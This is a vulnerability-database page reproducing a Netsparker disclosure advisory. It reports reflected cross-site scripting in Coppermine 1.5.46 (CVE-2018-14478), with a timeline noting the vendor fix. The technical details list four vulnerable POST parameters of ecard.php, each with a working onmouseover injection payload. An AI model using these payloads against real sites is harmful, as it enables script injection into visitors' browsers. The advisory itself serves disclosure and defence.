Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormZekvan ArslanPACKETSTORM:151306
HistoryJan 23, 2019 - 12:00 a.m.

Coppermine 1.5.46 Cross Site Scripting

2019-01-2300:00:00
Zekvan Arslan
packetstormsecurity.com
31

0.002 Low

EPSS

Percentile

51.6%

JSON
`Multiple Reflected Cross-site Scripting Vulnerabilities in Coppermine 1.5.46  
  
Information  
--------------------  
  
Advisory by Netsparker  
Name: Multiple Reflected Cross-site Scripting in Coppermine 1.5.46  
Affected Software: Coppermine  
Affected Versions: 1.5.46  
Homepage: http://coppermine-gallery.net/  
Vulnerability: Reflected Cross-site Scripting  
Severity: High  
Status: Fixed  
CVE-ID: 2018-14478  
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N  
Netsparker Advisory Reference: NS-18-050  
  
Technical Details  
--------------------  
  
URL: /ecard.php?album=1&pid=1  
Parameter Name : sender_name  
Parameter Type : Post  
Attack Patern : x" onmouseover=alert(0x01B2D5) x="  
  
URL : /ecard.php?album=1&pid=1  
Parameter Name : recipient_email  
Parameter Type : POST  
Attack Patern : x" onmouseover=alert(0x01B2DD) x="  
  
URL : /ecard.php?album=1&pid=1  
Parameter Name : greetings  
Parameter Type : POST  
Attack Patern : x" onmouseover=alert(0x01B2E3) x="  
  
URL : /ecard.php?album=1&pid=1  
Parameter Name : recipient_name  
Parameter Type : POST  
Attack Patern : x" onmouseover=alert(0x01B2D9) x="  
  
For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).  
  
Advisory Timeline  
--------------------  
  
12th November 2018 - First Contact  
21th December 2018 - Vendor Fixed  
23th January 2019 - Advisory Released  
  
Credits & Authors  
--------------------  
  
These issues have been discovered by Zekvan Arslan while testing Netsparker Web Application Security Scanner.  
  
About Netsparker  
--------------------  
  
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.  
`

Related

cvelist 1
cve 1
prion 1
openvas 1
nvd 1
cvelist
cvelist
CVE-2018-14478
2019-05-07 17:41:50
cve
cve
CVE-2018-14478
2019-05-07 18:29:00
prion
prion
Design/Logic Flaw
2019-05-07 18:29:00
openvas
openvas
Coppermine < 1.5.48 XSS Vulnerability
2019-02-05 00:00:00
nvd
nvd
CVE-2018-14478
2019-05-07 18:29:00

0.002 Low

EPSS

Percentile

51.6%

JSON
Related for PACKETSTORM:151306
cvelist1cve1prion1openvas1nvd1